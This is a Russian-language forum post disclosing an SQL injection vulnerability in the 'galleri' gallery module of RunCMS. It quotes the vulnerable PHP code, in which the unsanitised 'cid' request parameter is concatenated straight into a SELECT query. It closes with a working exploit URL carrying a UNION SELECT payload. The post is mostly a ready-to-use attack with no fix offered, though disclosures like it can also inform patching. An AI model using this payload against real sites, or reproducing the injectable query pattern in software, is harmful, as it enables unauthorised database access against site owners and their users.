Prev Предыдущее сообщение   Следующее сообщение Next
Старый 03.07.2010, 16:13   #1
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию Уязвимости RunCMS и модулей

SQL-Inj в стандартном модуле RunCMS galleri

/modules/galleri/class/galltree.php

PHP код:
...
10   class GallTree{
11    var $table;   
12    var $id
13    var $pid;    
14    var $order;   
15    var $title;   
16    var $db;
17  
18    
function GallTree($table_name$id_name$pid_name){
19      global $db;
20      $this->db $db;
21      $this->table $table_name;
22      $this->id $id_name;
23      $this->pid $pid_name;
24    }
...
144    function getNicePathFromId($sel_id$title$funcURL$path=""){
145      $sql "SELECT ".$this->pid.", ".$title." FROM ".$this->table." WHERE ".$this->id."=$sel_id";
146      $result $this->db->query($sql);
147      if ( $this->db->num_rows($result) == ) {
148        return $path;
149      }
150      list($parentid,$name) = $this->db->fetch_row($result);
151      $myts =& GallTextSanitizer::getInstance();
152      $name $myts->makeTboxData4Show($name);
153      $path "<a href='".$funcURL."&".$this->id."=".$sel_id."'>".$name."</a>&nbsp;:&nbsp;".$path."";
154      if ( $parentid == ) {
155        return $path;
156      }
157      $path $this->getNicePathFromId($parentid$title$funcURL$path);
158      return $path;
159    }
... 
/modules/galleri/viewcat.php

PHP код:
...
12    include_once(GALLI_PATH."/class/galltree.php");
13    $galltree = new GallTree($db->prefix("galli_category"),"cid","scid");
...
17   if (isset($_GET['cid'])) {
18      $cid = $_GET['cid'];
19    }elseif(isset($_POST['cid'])) {
20      $cid = $_POST['cid'];
21    }else{
22      if ($id == 0){
23           ?>
24         <html><head>
25         <meta http-equiv='refresh' content='0;URL=index.php'>
26         </head></html>
27           <?php
28           
exit();
29           }else{
30               $tempid = new GallImg($id);
31               $cid $tempid->cid();
32           }
33     }
...
73   $pathstring "<a href='index.php'>"._MD_MAIN."</a>&nbsp;:&nbsp;";
74   $nicepath $galltree->getNicePathFromId($cid"coment""viewcat.php?");
75   $pathstring .= $nicepath;
76   
77   
echo "<b>".$pathstring."</b>";
...
Реализация:
Код:
http://localhost/runcms/modules/galleri/viewcat.php?cid=-1+union+select+1,2
Ded MustD!e вне форума   Ответить с цитированием
 

Метки
модули, runcms

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot